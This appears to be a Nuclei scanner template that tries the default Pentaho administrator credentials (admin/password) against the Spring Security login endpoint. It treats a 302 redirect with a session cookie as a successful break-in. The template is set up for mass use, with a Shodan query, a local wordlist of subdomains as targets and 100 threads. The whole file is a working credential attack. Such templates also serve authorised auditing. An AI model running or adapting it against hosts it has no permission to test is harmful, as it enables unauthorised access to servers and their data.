id: pentaho-default-login

info:
  name: Pentaho Default Login
  author: pussycat0x
  severity: high
  metadata:
    shodan-query: 'pentaho'
  tags: pentaho,default-login

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        POST /pentaho/j_spring_security_check HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        
        j_username=admin&j_password=password
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - 'pentaho/Home'
          - 'JSESSIONID='
        condition: and

      - type: status
        status:
          - 302
